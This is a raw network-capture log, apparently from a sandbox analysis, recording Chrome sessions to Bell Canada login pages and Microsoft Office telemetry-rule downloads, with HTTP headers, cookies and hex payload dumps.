                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 604
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000ebd5cba293134e0691d39196352d686cf6f6aa1333eb8c034ded9fcccd7ae01d08ed92773b1130008b55c6511aff010b10033ec317cfbfcf62fe15bed26fbe78c923dda43bf22d36fef085c13810cee06027e5f1b2e39512; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC604INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 23 08 06 00 00 00 09 fb 23 90 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 02 11 49 44 41 54 58 85 ed 98 4d 88 4d 61 18 80 9f d7 5c 3f 31 a6 2e 65 e3 77 37 45 4a 4d cc c2 42 7e 42 29 4a d2 ec 6c 26 2b 0b 14 25 4b 65 6d 35 35 0b 16 52 c8 c2 c6 8a b2 11 a5 a4 24 32 56 a8 41 a2 a1 26 32 d4 63 71 bf 5b 77 dc 3b 35 f7 7e 67 e6 ce ad fb d4 e9 9c ef 7c df fb 9e a7 73 de f3 7d a7 13 64 a0 ee 01 46 80 c5 39 79 66 60 0a 18 8e 88 c7 a5 cc 44 3b 80 7e e0 4e be d3 34 96 00 47 80 01 20 5b 12 80 88 38 5e 44 9e 2a ea 2a e0 5b b5 bd a8 c8 e4 73 45 57 b2 28 ba 92 45 51 52 87 80 4b 34 27 fc 1a 38 3c 37 4a f5 94 80 dd c0 5a e0 5e 13 71 6f 23 42 75 6e ac fe a3 3a 4f 4e 14 3d d7 15 49 47 d4 64
                                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR)##bKGDIDATXMMa\?1.ew7EJMB~B)Jl&+%Kem55R$2VA&2cq[w;5~g|s}dF9yf`D;~N4G [8^D**[sEW(EQRK4'8<7JZ^qo#Bun:ON=IGd


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      103192.168.2.94988552.9.108.2234433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2541OUTGET /getapploginpage HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: m.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSR [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC503INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: _s=S6c9HjLG1CKQ24ifOYUX5B5hCZzHCSe7lfumMUowKETY2281c4GOWO2X5PlM16AY; Max-Age=31536000; Path=/; Expires=Fri, 31 Oct 2025 13:12:09 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                      Location: https://bell.app.link/9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      104192.168.2.949890206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2875OUTGET /TeaLeaf/TealeafTarget.aspx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5Cl [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache,no-cache
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Server-Timing: dtSInfo;desc="0", dtRpid;desc="-1489561692"
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 75
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20002454a88a045c80306d9598cc7a01b762458ce945a676e88b04f39b1ec892d42508b6d6e4f51130002975f9de2de51aed10033ec317cfbfcf62fe15bed26fbe78c923dda43bf22d36fef085c13810cee06027e5f1b2e39512; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC75INData Raw: 0d 0a 0d 0a 54 65 61 6c 65 61 66 20 54 61 72 67 65 74 20 56 65 72 73 69 6f 6e 20 32 2e 30 0d 0a 0d 0a 20 61 6e 64 20 44 61 74 65 74 69 6d 65 20 69 73 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 39 3a 31 32 3a 30 39 20 41 4d 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Tealeaf Target Version 2.0 and Datetime is: 10/31/2024 9:12:09 AM


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      105192.168.2.94988713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1952
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131209Z-15b8d89586fhl2qtatrz3vfkf00000000fug00000000bk0u
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      106192.168.2.94989313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2592
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 335320d3-001e-000b-4596-2a15a7000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131209Z-16849878b786fl7gm2qg4r5y7000000009yg000000000pe3
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      107192.168.2.94988613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 958
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 34089ae0-601e-005c-0dae-2af06f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131209Z-159b85dff8fj6b6xhC1DFW8qdg00000001d00000000019ku
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      108192.168.2.94989413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131209Z-16849878b78nzcqcd7bed2fb6n00000001z000000000dpcx
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      109192.168.2.94989513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 501
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
